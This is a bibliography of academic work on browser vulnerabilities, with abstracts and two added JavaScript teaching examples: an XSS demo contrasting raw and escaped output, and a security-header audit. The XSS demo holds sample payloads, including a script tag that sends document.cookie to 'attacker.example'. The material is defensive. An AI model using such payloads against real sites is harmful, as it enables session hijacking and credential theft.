Academic literature on the topic 'Browser Vulnerability'


Journal articles on the topic "Browser Vulnerability"

1

Fajar, Abdullah, and Setiadi Yazid. "Web Browser Vulnerabilities and Weakness Descriptive Analysis: Is it Chrome Keep Dominant?" International Journal of Engineering & Technology 7, no. 4.44 (2018): 242. http://dx.doi.org/10.14419/ijet.v7i4.44.26999.

Abstract:
Web browsers play an important and mandatory role in accessing applications through the internet, and may carry malicious content to the system, hence threatening the system from the attacker. Google Chrome has been one of the most popular browsers since its release in 2008 as a product of the Chromium Project at Google. Chrome ranks fourth on the Common Vulnerabilities Enumeration website and first among browsers in the number of vulnerabilities reported. This paper describes a descriptive analysis of the weaknesses and vulnerabilities of the Chrome browser. The analysis uses a comparison approach against other popular browsers such as Safari and Firefox. It also uses as its main reference the database from mitre.org, which holds the Common Weakness Enumeration database and the scoring system for vulnerabilities. This work covers the responsiveness rate among the browsers regarding the duration of weakness and vulnerability updates, and the severity rate. Validation was performed using a descriptive test of weakness and vulnerability behaviour. According to the Architectural, Development and Research Conceptual weaknesses reported, the browsers do not indicate a significant difference except between Chrome and Firefox in Research Conceptual weaknesses. The highest vulnerability severity is shown by Firefox, and the best responsiveness in updating browser weaknesses is shown by Chrome, followed by Safari. According to the descriptive analysis, Chrome will keep its dominance over the other browsers, while Firefox and Safari potentially become unpopular, as Internet Explorer did, in the coming years.
2

Chalyi, Oleksii, Kęstutis Driaunys, and Vytautas Rudžionis. "Assessing Browser Security: A Detailed Study Based on CVE Metrics." Future Internet 17, no. 3 (2025): 104. https://doi.org/10.3390/fi17030104.

Abstract:
This study systematically evaluates the vulnerabilities of modern web browsers using developed indices derived from the CVE database, including ICVE, ICVSS, IR and IT. These indices incorporate metrics such as vulnerability severity and risks, along with browser popularity, to enable a balanced comparison of browser security. The results highlight significant differences in browser security: while Google Chrome and Samsung Internet exhibited lower threat indices, Mozilla Firefox demonstrated consistently higher scores, indicating greater exposure to risks. These observations slightly contradict widespread opinion. The findings emphasize the importance of timely software updates in mitigating vulnerabilities, as many incidents were linked to outdated browser versions. This study also introduces a robust methodology for assessing browser threats, providing a framework for future research. Potential applications include developing browser-based penetration testing systems to simulate phishing and data extraction scenarios, offering insights into user-specific risks and broader organizational impacts. By combining theoretical analysis with practical implications, this work contributes to advancing browser security and lays the foundation for future applied research in cybersecurity.
3

Wang, Junjie, Xiaohong Li, Bobo Yan, and Zhiyong Feng. "Pointer Analysis Based Vulnerability Detection for Browser Extension." International Journal of Digital Content Technology and its Applications 6, no. 1 (2012): 488–95. http://dx.doi.org/10.4156/jdcta.vol6.issue1.59.
4

Ray, Loye Lynn. "Countering Cross-Site Scripting in Web-based Applications." International Journal of Strategic Information Technology and Applications 6, no. 1 (2015): 57–68. http://dx.doi.org/10.4018/ijsita.2015010105.

Abstract:
Today's dynamic web-based applications have become a normal and critical asset to an organization's business. They come with an increase in the number of web vulnerabilities and attacks. These weaknesses allow hackers to focus their attention on attacking this important information source. The most common vulnerability is cross-site scripting (XSS), one of the Open Web Application Security Project (OWASP) top ten web threats. XSS occurs when a web-based application allows untrusted information to be accepted and sent back to a browser. Attackers can also execute scripts within a browser that deface web sites, redirect users to malicious content and hijack browsers. One reason for this problem is the lack of developer understanding of the causes of XSS. In this paper, the authors address the causes of XSS and countermeasures to defend against these threats.
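The mechanism the abstract describes, untrusted input accepted and sent back to the browser, is easier to see in code. The following is an added example, not code from Ray's paper: a server-side template that echoes a search query, first in its vulnerable form and then with output encoding for the context the value lands in, plus a small check a test suite could run over rendered pages. The sample queries and both payloads are constructed for the example; escapeHtml, renderSearchVulnerable, renderSearchSafe and containsActiveMarkup are names chosen here.

```javascript
// Added example (not from the cited paper): a reflected XSS sink in a
// server-rendered search page, shown vulnerable and then output-encoded.
// Pure functions, no server needed; the sample queries below are constructed.

// Encode the characters that let data break out of an HTML text node or a
// double-quoted attribute value. This covers only those two contexts;
// values placed in URLs, inline scripts or CSS need their own encoders.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable: the query is interpolated into the page unchanged, so the
// browser parses attacker-controlled text as markup.
function renderSearchVulnerable(query) {
  return `<p>Results for: ${query}</p>` +
         `<input name="q" value="${query}">`;
}

// Hardened: the same template with the untrusted value encoded at output time.
function renderSearchSafe(query) {
  const q = escapeHtml(query);
  return `<p>Results for: ${q}</p>` +
         `<input name="q" value="${q}">`;
}

// Test-suite heuristic, not a sanitizer: flag any tag the template does not
// emit itself, or any attribute whose name starts with "on" (inline handler).
const TEMPLATE_TAGS = new Set(['p', 'input']);
const TAG_RE = /<\/?([a-z][a-z0-9]*)\b([^>]*)>/gi;
const ATTR_RE = /([^\s"'=<>\/]+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+))?/g;

function containsActiveMarkup(html, allowedTags = TEMPLATE_TAGS) {
  for (const tag of html.matchAll(TAG_RE)) {
    if (!allowedTags.has(tag[1].toLowerCase())) return true;
    for (const attr of tag[2].matchAll(ATTR_RE)) {
      if (/^on/i.test(attr[1])) return true;
    }
  }
  return false;
}

// Constructed inputs: a benign query and two classic payloads.
const SAMPLE_QUERIES = {
  benign: 'browser vulnerability',
  scriptTag: '<script>document.location="https://attacker.example/?c="+document.cookie</script>',
  attrBreakout: '"><img src=x onerror=alert(1)>',
};

// Render every sample through both templates and report whether the payload
// survives as active markup.
function demo() {
  const results = {};
  for (const [name, query] of Object.entries(SAMPLE_QUERIES)) {
    results[name] = {
      vulnerable: containsActiveMarkup(renderSearchVulnerable(query)),
      safe: containsActiveMarkup(renderSearchSafe(query)),
    };
  }
  return results;
}

console.log(JSON.stringify(demo(), null, 2));
```

The check is a test heuristic over this template's known tag set, not a defence: it tokenises tags crudely and must not be used as a filter. The defence is the encoding, applied at output time for the context the value lands in (HTML text and a double-quoted attribute here); the same payload placed in a URL, an inline script or a style block needs that context's encoder instead.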
5

Johnston, Reuben, Shahryar Sarkani, Thomas Mazzuchi, Thomas Holzer, and Timothy Eveleigh. "Multivariate models using MCMCBayes for web-browser vulnerability discovery." Reliability Engineering & System Safety 176 (August 2018): 52–61. http://dx.doi.org/10.1016/j.ress.2018.03.024.

6

Priyanka, K., Krishna P. Yuvan, Kumar JS Ajay, J. Dharun, N. Rooban, and N. Vinayagamoorthy. "Web Extension for Recon." Journal of Research and Review: Hacking Techniques and Information Security Systems 1, no. 2 (2025): 11–16. https://doi.org/10.5281/zenodo.15589787.

Abstract:
This paper presents a browser extension designed to automate fundamental reconnaissance activities directly within the web browser environment. The extension dynamically captures the URL of the currently active webpage and systematically executes a suite of reconnaissance operations, including subdomain enumeration, HTTP header analysis, DNS resolution and port scanning. By integrating these capabilities natively into the browser, the tool enables security researchers and ethical hackers to rapidly access critical reconnaissance insights without reliance on external utilities or complex configurations. Emphasizing usability, efficiency, and automation, this solution transforms routine webpage visits into immediate opportunities for comprehensive vulnerability assessment, significantly simplifying the initial phases of security analysis.
7

Johnston, Reuben, Shahryar Sarkani, Thomas Mazzuchi, Thomas Holzer, and Timothy Eveleigh. "Bayesian-model averaging using MCMCBayes for web-browser vulnerability discovery." Reliability Engineering & System Safety 183 (March 2019): 341–59. http://dx.doi.org/10.1016/j.ress.2018.11.030.

8

Darmawan, Candra, Julius Panda Putra Naibaho, and Alex De Kweldju. "Penerapan Metode Vulnerability Assessment untuk Identifikasi Keamanan Website berdasarkan OWASP ID Tahun 2021" [Applying the Vulnerability Assessment Method to Identify Website Security Issues Based on the 2021 OWASP IDs]. Edumatic: Jurnal Pendidikan Informatika 8, no. 1 (2024): 272–81. http://dx.doi.org/10.29408/edumatic.v8i1.25834.

Abstract:
Universities, as educational institutions, are potential targets of cyber attacks. This is an inevitable problem, and the University of Papua (UNIPA) is no exception. The purpose of this research is to find the security gaps in the UNIPA website based on the 2021 OWASP IDs and to implement mitigation. The type of research is quantitative research using the Vulnerability Assessment and Penetration Testing (VAPT) life cycle method. The VAPT method in this research goes through five stages, namely scope, information gathering, vulnerability assessment, risk assessment, and reporting. The object of research is the UNIPA website. Data collection uses primary data, the results of scanning with the Zed Attack Proxy (ZAP) application. The data obtained consist of alert IDs, alerts, risk, and OWASP IDs as information on the vulnerability of the UNIPA website. The research data are analysed using OWASP IDs. Our findings show that the vulnerability of the UNIPA website is influenced by two factors: website security weaknesses and user negligence. Vulnerabilities with alert IDs A1, A2, A3, A4, A5, and A6 form the group of website security weaknesses. As a solution, these vulnerabilities need special mechanisms such as anti-CSRF tokens, CSP, a CDN, the Strict-Transport-Security header, and timestamp checking so that the website is proportionate. Meanwhile, the vulnerability with alert ID A7 is classified as user negligence. The solution is that users must use the latest version of the browser. Browsers of the latest version have the X-Content-Type-Options: nosniff security mechanism to prevent sniffing attacks.
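A caveat on the last sentence of the abstract: X-Content-Type-Options: nosniff, like CSP and Strict-Transport-Security, is a response header the server has to send; an up-to-date browser only enforces it once it is present. The following added example, not code from the study, shows the kind of passive check ZAP performs on response headers: a weak response beside a hardened one, both constructed for the example, and an audit function that reports what is missing. The header values, the cookie name PHPSESSID and the CSP nonce are placeholders; auditSecurityHeaders and the two header constants are names chosen here.

```javascript
// Added example (not from the cited study): a passive response-header audit
// of the kind ZAP reports, run over two constructed responses. No server is
// contacted; everything below is built inline.

// Lower-case header names and keep every value as an array, because
// Set-Cookie legitimately repeats.
function normaliseHeaders(headers) {
  const out = {};
  for (const [name, value] of Object.entries(headers)) {
    const key = name.toLowerCase();
    out[key] = (out[key] || []).concat(value);
  }
  return out;
}

const ONE_YEAR = 31536000; // seconds; a common minimum for HSTS max-age

function auditSecurityHeaders(rawHeaders) {
  const h = normaliseHeaders(rawHeaders);
  const first = (name) => (h[name] ? h[name][0] : undefined);
  const findings = [];

  // X-Content-Type-Options is set by the server; the browser only honours it.
  const xcto = first('x-content-type-options');
  if (!xcto || xcto.trim().toLowerCase() !== 'nosniff') {
    findings.push('X-Content-Type-Options: nosniff missing (MIME sniffing possible)');
  }

  // A CSP that still permits inline script without a nonce or hash does
  // little against XSS, so report that as well as outright absence.
  const csp = first('content-security-policy');
  if (!csp) {
    findings.push('Content-Security-Policy missing');
  } else if (/'unsafe-inline'/.test(csp) && !/'(nonce-|sha(256|384|512)-)/.test(csp)) {
    findings.push("Content-Security-Policy allows 'unsafe-inline' without nonce or hash");
  }

  // HSTS: present, and with a max-age long enough to matter.
  const hsts = first('strict-transport-security');
  const maxAge = hsts && /max-age=(\d+)/i.exec(hsts);
  if (!maxAge) {
    findings.push('Strict-Transport-Security missing');
  } else if (Number(maxAge[1]) < ONE_YEAR) {
    findings.push(`Strict-Transport-Security max-age ${maxAge[1]} is under one year`);
  }

  // Session cookie attributes. SameSite is only a partial CSRF mitigation;
  // the application's anti-CSRF token check cannot be verified from headers.
  for (const cookie of h['set-cookie'] || []) {
    const [pair, ...attrs] = cookie.split(';').map((s) => s.trim());
    const name = pair.split('=')[0];
    const lower = attrs.map((a) => a.toLowerCase());
    const missing = [];
    if (!lower.includes('secure')) missing.push('Secure');
    if (!lower.includes('httponly')) missing.push('HttpOnly');
    if (!lower.some((a) => a.startsWith('samesite='))) missing.push('SameSite');
    if (missing.length) findings.push(`cookie ${name} lacks ${missing.join(', ')}`);
  }
  return findings;
}

// Constructed responses: a default Apache/PHP-style reply and a hardened one.
// The cookie name and the CSP nonce are placeholders, not real values.
const WEAK_RESPONSE_HEADERS = {
  'Content-Type': 'text/html; charset=utf-8',
  'Server': 'Apache',
  'Set-Cookie': ['PHPSESSID=abc123; Path=/'],
};

const HARDENED_RESPONSE_HEADERS = {
  'Content-Type': 'text/html; charset=utf-8',
  'X-Content-Type-Options': 'nosniff',
  'Content-Security-Policy':
    "default-src 'self'; script-src 'self' 'nonce-r4nd0m'; object-src 'none'; base-uri 'none'",
  'Strict-Transport-Security': 'max-age=31536000; includeSubDomains',
  'Set-Cookie': ['PHPSESSID=abc123; Path=/; Secure; HttpOnly; SameSite=Lax'],
};

console.log('weak:', auditSecurityHeaders(WEAK_RESPONSE_HEADERS));
console.log('hardened:', auditSecurityHeaders(HARDENED_RESPONSE_HEADERS));
```

The weak response yields four findings (nosniff, CSP and HSTS absent, and a session cookie without Secure, HttpOnly or SameSite); the hardened one yields none. Anti-CSRF tokens and timestamp checks, the other two items the abstract lists, live in the application and have to be exercised with requests, which is why this audit only reports the cookie attributes as a partial check.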
9

Wei, Qiang, Ze Hui Wu, Rong Hua Tao, and Dong Ren. "Authentication Algorithm Based on Hash-Tree for Web Single Sign-On." Applied Mechanics and Materials 490-491 (January 2014): 1368–73. http://dx.doi.org/10.4028/www.scientific.net/amm.490-491.1368.

Abstract:
During the authentication process of a web-based single sign-on system, it is insecure that all authentication messages are forwarded by the browser, and their integrity protection is not comprehensive. This vulnerability can be exploited by attackers to bypass the authentication system and log in to any account. In this work we analyse the threat model of the vulnerability and its root causes in detail, and propose an authentication algorithm based on a hash tree. This algorithm not only improves the security of the system; the processing efficiency of the system is also acceptable according to the simulation results.
10

Revyakina, Yelena, Larissa Cherckesova, Olga Safaryan, Denis Korochentsev, Nikolay Boldyrikhin, and Yuri Ivanov. "Possibilities of conducting XSS-attacks and the development of countermeasures." E3S Web of Conferences 224 (2020): 01040. http://dx.doi.org/10.1051/e3sconf/202022401040.

Abstract:
The article describes the investigation of the possibilities of XSS attacks and the development of means of counteracting these attacks. The research determined whether an XSS attack can be carried out successfully and whether vulnerability detection methods can be applied; the logical and structural diagrams of an XSS vulnerability detection program were developed; and software implementing algorithms for detecting XSS vulnerabilities on web sites was realised. The software implementation is a web extension for the Google Chrome browser. The main purpose of implementing this software is to confirm or deny the presence of XSS vulnerabilities on a site, and to counteract a possible attack.

Dissertations / Theses on the topic "Browser Vulnerability"

1

Chi, Tzu-Yen (姬子嚴). "Exploit Kit Kill Chain Lab: Automatic website redirect and browser vulnerability exploit." Thesis, 2018. http://ndltd.ncl.edu.tw/handle/49rg5m.

Abstract:
Master's thesis, Chien Hsin University of Science and Technology (健行科技大學), Master's Program in Computer Science and Information Engineering, academic year 106 (ROC calendar).

Nowadays, the Internet is not only convenient but also dangerous in human life. Most malware is spread through exploit kits, which are the most popular way to infect victims on the Internet. The exploit kit is also the most threatening attack, being the entry point of the Cyber Kill Chain. Today there are few real exploit kit environments, and global malicious URL databases lack exploit kit information or detection. It is hard to understand and experience how an exploit kit redirects a website and infects a victim. Because of that, in this thesis we build an exploit kit simulation platform, including a network topology, to learn how exploit kits work. By setting up a monitoring module to record activity, we can learn the architecture of website redirection and how the browser is exploited to make the victim download and execute malware when the victim browses the exploit kit.
2

Djeric, Vladan. "Securing Script-based Extensibility in Web Browsers." Thesis, 2009. http://hdl.handle.net/1807/18281.

Abstract:
Web browsers are increasingly designed to be extensible to keep up with the Web's rapid pace of change. This extensibility is typically implemented using script-based extensions. Script extensions have access to sensitive browser APIs and content from untrusted web pages. Unfortunately, this powerful combination creates the threat of privilege escalation attacks that grant web page scripts the full privileges of script extensions and control over the entire browser process. This thesis describes the pitfalls of script-based extensibility based on our study of the Firefox Web browser, and is the first to offer a classification of script-based privilege escalation vulnerabilities. We propose a taint-based system to track the spread of untrusted data in the browser and to detect the characteristic signatures of privilege escalation attacks. We show that this approach is effective by testing our system against exploits in the Firefox bug database and finding that it detects the vast majority of attacks with no false alarms.
3

Shahriar, Hossain. "Mitigation of Web-Based Program Security Vulnerability Exploitations." Thesis, 2011. http://hdl.handle.net/1974/6892.

Abstract:
Over the last few years, web-based attacks have caused significant harm to users. Many of these attacks occur through the exploitation of common security vulnerabilities in web-based programs. Given that, mitigation of these attacks is extremely crucial to reduce some of the harmful consequences. Web-based applications contain vulnerabilities that can be exploited by attackers at the client side (browser) without the victim's (browser user's) knowledge. This thesis is intended to mitigate some exploitations due to the presence of security vulnerabilities in web applications while performing seemingly benign functionalities at the client side. For example, visiting a webpage might result in JavaScript code execution (cross-site scripting), downloading a file might lead to the execution of JavaScript code (content sniffing), clicking on a hyperlink might result in sending unwanted legitimate requests to a trusted website (cross-site request forgery), and filling out a seemingly legitimate form may eventually lead to the theft of credential information (phishing). Existing web-based attack detection approaches suffer from several limitations such as (i) modification of both server and client-side environments, (ii) exchange of sensitive information between the server and client, and (iii) lack of detection of some attack types. This thesis addresses these limitations by mitigating four security vulnerabilities in web applications: cross-site scripting, content sniffing, cross-site request forgery, and phishing. We mitigate the exploitation of these vulnerabilities by developing automatic attack detection approaches at both the server and client sides. We develop server-side attack detection frameworks to detect attack symptoms within response pages before sending them to the client. The approaches are designed on the assumption that the server-side program source is available for analysis, but we are not allowed to alter the program code or the runtime environments.

Moreover, we develop client-side attack detection frameworks so that some level of protection is present when the source code of server websites (either trusted or untrusted) is not available. Our proposed solutions explore several techniques such as response page parsing and file content analysis, browser-level checking of requests and responses, and finite state machine-based behavior monitoring. The thesis evaluates the proposed attack detection approaches with real-world vulnerable programs. The evaluation results indicate that our approaches are effective and perform better than the related work. We also contribute to the development of benchmark suites for evaluating attack detection techniques.

Ph.D. thesis (Computing), Queen's University, 2011-11-29.

Book chapters on the topic "Browser Vulnerability"

1

Ter Louw, Mike, Jin Soon Lim, and V. N. Venkatakrishnan. "Extensible Web Browser Security." In Detection of Intrusions and Malware, and Vulnerability Assessment. Springer Berlin Heidelberg, 2007. http://dx.doi.org/10.1007/978-3-540-73614-1_1.

2

Hausknecht, Daniel, Jonas Magazinius, and Andrei Sabelfeld. "May I? - Content Security Policy Endorsement for Browser Extensions." In Detection of Intrusions and Malware, and Vulnerability Assessment. Springer International Publishing, 2015. http://dx.doi.org/10.1007/978-3-319-20550-2_14.

3

Yen, Ting-Fang, Xin Huang, Fabian Monrose, and Michael K. Reiter. "Browser Fingerprinting from Coarse Traffic Summaries: Techniques and Implications." In Detection of Intrusions and Malware, and Vulnerability Assessment. Springer Berlin Heidelberg, 2009. http://dx.doi.org/10.1007/978-3-642-02918-9_10.

4

Chatzoglou, Efstratios, Vyron Kampourakis, Zisis Tsiatsikas, Georgios Karopoulos, and Georgios Kambourakis. "Keep Your Memory Dump Shut: Unveiling Data Leaks in Password Managers." In ICT Systems Security and Privacy Protection. Springer Nature Switzerland, 2024. http://dx.doi.org/10.1007/978-3-031-65175-5_5.

Abstract:
Password management has long been a persistently challenging task. This led to the introduction of password management software, which has been around for at least 25 years in various forms, including desktop and browser-based applications. This work assesses the ability of two dozen password managers, 12 desktop applications, and 12 browser plugins, to effectively protect the confidentiality of secret credentials in six representative scenarios. Our analysis focuses on the period during which a Password Manager (PM) resides in the RAM. Despite the sensitive nature of these applications, our results show that across all scenarios, only three desktop PM applications and two browser plugins do not store plaintext passwords in the system memory. Oddly enough, at the time of writing, only two vendors recognized the exploit as a vulnerability, reserving CVE-2023-23349, while the rest chose to disregard or underrate the issue.
5

Durey, Antonin, Pierre Laperdrix, Walter Rudametkin, and Romain Rouvoy. "FP-Redemption: Studying Browser Fingerprinting Adoption for the Sake of Web Security." In Detection of Intrusions and Malware, and Vulnerability Assessment. Springer International Publishing, 2021. http://dx.doi.org/10.1007/978-3-030-80825-9_12.

6

Wang, Qin, Xiaohong Li, and Bobo Yan. "A Browser Extension Vulnerability Detecting Approach Based on Behavior Monitoring and Analysis." In Communications in Computer and Information Science. Springer Berlin Heidelberg, 2012. http://dx.doi.org/10.1007/978-3-642-34447-3_24.

7

Amin Azad, Babak, Oleksii Starov, Pierre Laperdrix, and Nick Nikiforakis. "Short Paper - Taming the Shape Shifter: Detecting Anti-fingerprinting Browsers." In Detection of Intrusions and Malware, and Vulnerability Assessment. Springer International Publishing, 2020. http://dx.doi.org/10.1007/978-3-030-52683-2_8.

8

Laperdrix, Pierre, Gildas Avoine, Benoit Baudry, and Nick Nikiforakis. "Morellian Analysis for Browsers: Making Web Authentication Stronger with Canvas Fingerprinting." In Detection of Intrusions and Malware, and Vulnerability Assessment. Springer International Publishing, 2019. http://dx.doi.org/10.1007/978-3-030-22038-9_3.

9

Egele, Manuel, Peter Wurzinger, Christopher Kruegel, and Engin Kirda. "Defending Browsers against Drive-by Downloads: Mitigating Heap-Spraying Code Injection Attacks." In Detection of Intrusions and Malware, and Vulnerability Assessment. Springer Berlin Heidelberg, 2009. http://dx.doi.org/10.1007/978-3-642-02918-9_6.

10

Gupta, Shashank, and B. B. Gupta. "BDS." In Application Development and Design. IGI Global, 2018. http://dx.doi.org/10.4018/978-1-5225-3422-8.ch039.

Abstract:
Cross-Site Scripting (XSS) is a vulnerability on the client-side browser that is caused by improper sanitization of user input embedded in web pages. Researchers in the past have proposed various types of defensive strategies, vulnerability scanners, etc., but XSS flaws still remain in web applications due to inadequate understanding and implementation of the various defensive tools and strategies. Therefore, in this chapter, the authors propose a security model called Browser Dependent XSS Sanitizer (BDS) on the client-side web browser for eliminating the effect of XSS vulnerabilities. Various earlier client-side solutions degrade performance on the web browser side. In this chapter, however, the authors use a three-step approach to bypass the XSS attack without degrading much of the user's web browsing experience. In the experiments, this approach is capable of preventing XSS attacks on various modern web browsers.

Conference papers on the topic "Browser Vulnerability"

1

Davari, Maryam, and Mohammad Zulkernine. "Analysing vulnerability reproducibility for Firefox browser." In 2016 14th Annual Conference on Privacy, Security and Trust (PST). IEEE, 2016. http://dx.doi.org/10.1109/pst.2016.7906955.

2

Chufeng, Zeng, and Wang Qingxian. "Systematical Vulnerability Detection in Browser Validation Mechanism." In 2011 Seventh International Conference on Computational Intelligence and Security (CIS). IEEE, 2011. http://dx.doi.org/10.1109/cis.2011.188.

3

Liu, Yuan, Wenbing Zhao, Dan Wang, and Lihua Fu. "A XSS Vulnerability Detection Approach Based on Simulating Browser Behavior." In 2015 2nd International Conference on Information Science and Security (ICISS). IEEE, 2015. http://dx.doi.org/10.1109/icissec.2015.7370974.

4

Khan, Nayeem, Johari Abdullah, and Adnan Shahid Khan. "Towards vulnerability prevention model for web browser using interceptor approach." In 2015 9th International Conference on IT in Asia (CITA). IEEE, 2015. http://dx.doi.org/10.1109/cita.2015.7349842.

5

Yu, Jianjia, Song Li, Junmin Zhu, and Yinzhi Cao. "CoCo: Efficient Browser Extension Vulnerability Detection via Coverage-guided, Concurrent Abstract Interpretation." In CCS '23: ACM SIGSAC Conference on Computer and Communications Security. ACM, 2023. http://dx.doi.org/10.1145/3576915.3616584.

6

Turnip, Togu Novriansyah, Hotma Aruan, Anita Lasmaria Siagian, and Leonardo Siagian. "Web Browser Extension Development of Structured Query Language Injection Vulnerability Detection Using Long Short-Term Memory Algorithm." In 2022 IEEE International Conference of Computer Science and Information Technology (ICOSNIKOM). IEEE, 2022. http://dx.doi.org/10.1109/icosnikom56551.2022.10034905.

7

Raunak, M. S., Richard Kuhn, Richard Kogut, and Raghu Kacker. "Vulnerability trends in web servers and browsers." In HotSoS '20: Hot Topics in the Science of Security. ACM, 2020. http://dx.doi.org/10.1145/3384217.3384227.

8

Aldoseri, Abdulla, and David Oswald. "insecure:// Vulnerability Analysis of URI Scheme Handling in Android Mobile Browsers." In Workshop on Measurements, Attacks, and Defenses for the Web. Internet Society, 2022. http://dx.doi.org/10.14722/madweb.2022.23003.

9

Radescu, Radu, and Sever Pasca. "ENHANCING THE SECURITY LEVEL OF THE NEW VERSION OF THE EASY-LEARNING ONLINE PLATFORM." In eLSE 2017. Carol I National Defence University Publishing House, 2017. http://dx.doi.org/10.12753/2066-026x-17-108.

Abstract:
The Easy-Learning platform is an online education system developed as an original product of the Department of Applied Electronics and Information Engineering of the University Politehnica of Bucharest. The platform has undergone many changes over the years, growing from a simple project into a complex and efficient virtual learning environment. At this time, the platform has achieved a high degree of maturity using the Symfony framework, which simplifies many repetitive tasks, enables automatic generation of entities and interoperates with other technologies currently in use. To design and implement version 2.0 of the Easy-Learning platform the following technologies were used: PHP5, JavaScript, HTML5, CSS3, the MariaDB database management system (in place of MySQL in previous versions), RESTful web services, Android, Apache (as web server) and methodologies for securing the communication between an application server and a client application. Due to the technology and security issues that arise in older versions of each framework, it was decided to rewrite the PHP code of the platform in order to use the Symfony 2 framework.

Access to the interfaces for administrator, tutor and student is secured using a user name and password, so that access is not allowed to unauthenticated users. On a server running MariaDB, multiple users may be defined. For security reasons, the root user should be used only for administrative purposes. Each user of the system must have an individual account, corresponding to a user name and password. These must not be identical to usernames and passwords outside the MariaDB system (for example, user names and passwords for UNIX and NT). Like MySQL, MariaDB has a complex system of privileges. A privilege is the right to perform a particular action on an object and is associated with a particular user; the concept is very similar to permissions on files. When users are created in MariaDB, they are assigned a set of privileges specifying the actions they can perform in the system.

JavaScript scripts are limited by severe restrictions imposed by web browsers: for security reasons, JavaScript cannot read, write, create or delete files on the hard disk. In terms of security, PHP provides developers with a flexible and efficient set of safety measures. The open-source development of PHP led to its rapid adaptation to the needs of the Web and to efficient and secure code. PHP 5.5 (2013) and 5.6 (2014) are stable versions that include fixes for security issues. Twig is a templating system that supports PHP; among the advantages of its use is its security function. Twig has a sandbox mode used to evaluate code, and can be used as a templating language where users are allowed to execute design actions.

Among the recent improvements made to the Easy-Learning platform are the rewriting of the PHP code so that the Symfony 2 framework structure can be used, and the securing of authentication forms and private sections using an SSL certificate. Symfony 2 allows passwords to be encrypted using different algorithms, such as MD5, SHA1, SHA512 and bcrypt. The bcrypt algorithm is a key derivation function for passwords based on the Blowfish cipher. Besides defining a salt to protect against dictionary-based attacks precomputed with different values, it is an adaptive function: over time, the number of iterations can be increased to make it more difficult to decrypt the password. The bcrypt encryption algorithm used for passwords in Symfony 2 is presented. Because the platform works with personal data, the data must be sent to the server through a secure protocol to prevent attacks such as Man in the Middle or data theft. To demonstrate the implementation of this requirement, SSL (Secure Sockets Layer) certificates generated on the development server were used. This means that when the Easy-Learning platform is accessed, the browser displays a warning message indicating that the SSL certificate was not issued by an authority. The operation of porting the new version of the platform to the production server introduced a valid certificate. The sections considered appropriate for the HTTPS protocol are: the login page, the admin interface, the tutor interface and the student interface. Communication via HTTPS is done using a (public key, private key) pair: the data entered in the form are encrypted using the public key and sent to the server, which, using the private key, can decrypt and extract the contents of the data sent. The procedures for securing a specific page in Symfony 2, and the entire admin interface, are presented.

In order to test platform vulnerabilities, Acunetix Web Vulnerability Scanner 8 was used. With this tool, the following vulnerabilities were tested: SQL Injection, XSS, Trojan Script, Week_Password_Basic_Auth, CRLF Injection, PHP Code Injection and CSRF. The results obtained by running this tool are presented. The recent contributions to the Easy-Learning platform include creating a RESTful web service that can be used by external applications to access public and private information, based on a token generated for each student using its authentication service. In the future, it is intended to add an external caching system such as Varnish.
10

Tamanna, Mahzabin, Joseph Stephens, Abdolhossein Sarrafzadeh, and Mohd Anwar. "Exploring User Perspectives on Prioritizing Security through Software Updates." In 15th International Conference on Applied Human Factors and Ergonomics (AHFE 2024). AHFE International, 2024. http://dx.doi.org/10.54941/ahfe1004772.

Abstract:
Security vulnerabilities can put users at risk if they do not promptly install necessary security updates. To minimize risk, software developers regularly release security updates that address known or potential vulnerabilities. However, previous studies have revealed numerous reasons why users may not adopt software updates. Additionally, the National Vulnerability Database (NVD) demonstrates that not all types of software are equally vulnerable to security breaches. Therefore, this study investigates users' perceptions of software updates while delving into the complex realm of human behavior, uncovering which type of software users prioritize when considering updates. This study also explores to what extent users trust these software updates.

To gain a comprehensive understanding of users' perspectives on software updates, we conducted a survey consisting of questions designed to uncover valuable insights into individual behaviors, attitudes, and preferences related to performing software updates. The questionnaire featured a list of seven categories of software, such as web browsers, multimedia players, and antivirus software. The participants ranked their preferred software categories for security updates. Our survey asked users about their trust in software updates for improving security. We collected user attitudes towards software updates to offer insights to developers, analysts, and users. Out of the 63 volunteers, 48 provided complete responses for us to analyze. The group had a nearly equal split of males and females (54.17% and 45.83%, respectively), with most being between 26 and 34 years old and having a higher level of education. All participants spent at least one hour per day on the computer.

Our analysis shows that around 29% of the respondents prioritize antivirus updates when deciding which categories of software to update for security. Additionally, approximately one quarter (26%) prioritize updates to the operating system, and approximately one in five respondents identify web browsers as significant for maintaining a secure infrastructure. Notably, only 3.52% of the participants consider multimedia software updates important. We also observed that around half of the respondents (48%) believe that updating software can enhance the security of their system. However, these users do not fully trust software updates. In contrast, 16% of users rarely or never rely on software updates. Moreover, approximately 40% of users have had negative experiences and were hesitant to apply software updates, which is likely a significant reason for their reluctance to depend on software updates.

In conclusion, these findings highlight user preferences and the factors that influence their decisions regarding which software categories they prioritize for updates based on security considerations. Users prioritize software that is essential or requires updates to run the system, such as OS updates. Furthermore, many users do not believe that updates can improve security due to past negative experiences. Achieving higher adoption rates of software updates remains an open challenge due to a persistent lack of trust. To improve security through software updates, it is not enough to progress only on the technological front; it is also essential to develop more effective strategies to make the updates reliable and win the trust of users.
